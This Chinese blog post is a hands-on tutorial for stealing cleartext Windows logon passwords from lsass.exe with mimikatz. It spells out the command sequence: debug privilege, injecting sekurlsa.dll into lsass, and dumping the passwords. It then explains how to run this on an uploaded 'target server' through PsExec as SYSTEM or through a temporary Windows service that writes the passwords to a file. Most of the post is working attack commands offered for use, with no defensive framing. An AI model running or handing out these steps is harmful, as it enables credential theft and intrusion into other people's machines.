介绍一下神器mimikatz,从lsass里抓密码

昨天弄了下OphCrack,一个破解windows密码的玩意,顺带想起了这个神器,mimikatz,本人首创中文译名为:咪咪卡住,不要笑,这是很严肃的名字。

咪咪卡住的下载地址:
http://blog.gentilkiwi.com/mimikatz

mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,是很强大的。下面看看从我的Win7 64位上面抓密码。
进入咪咪卡住的目录,运行:

1 //开始运行神器
2 mimikatz
3 //提升权限
4 privilege::debug
5 //注入dll
6 inject::process lsass.exe sekurlsa.dll
7 //抓取密码
8 @getLogonPasswords


不管密码多么复杂都能抓出来

作者的回答的原因是,在llsass中,明文密码经过加密算法的密文 (这个加密算法是可逆的 能被解密出明文)

这个咪咪卡住啦,支持

1 Windows XP (部分可以)
2 Windows Server 2003
3 Windows Server 2008
4 Windows Vista
5 Windows 7
6 Windows 7 SP1

在远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:

通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。

这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:

首先提取几个文件,只抓取密码的话,只需要这几个文件:

1 mimikatz_trunk\tools\PsExec.exe
2 mimikatz_trunk\Win32\mimikatz.exe
3 mimikatz_trunk\Win32\sekurlsa.dll

打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

然后使用以下任何一种方法即可抓取密码:

1 //最简单实用的方法,使用 PsExec.exe 启动。
2 //在系统帐户中运行 cmd.exe,或者直接运行 mimikatz.exe
3 psexec -s cmd.exe
4 //启动 mimikatz.exe
5 C:\mimikatz_trunk\Win32\mimikatz.exe
6 //提升权限
7 privilege::debug
8 //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
9 inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
10 //抓取密码
11 @getLogonPasswords
12 //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
13 exit
14  
15 //*********************************************************
16  
17 //使用 At 启动
18 at ***
19  
20 //*********************************************************
21  
22 //创建服务方法
23 sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
24 sc start getpassword
25 sc delete getpassword
26  
27 //*********************************************************
28  
29 //telnet 远程命令管道
30 telnet ****
订阅本站: http://www.nigesb.com/feed
写篇文章不容易,转载请注明来源,如果喜欢本站可以Feed订阅本站。
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值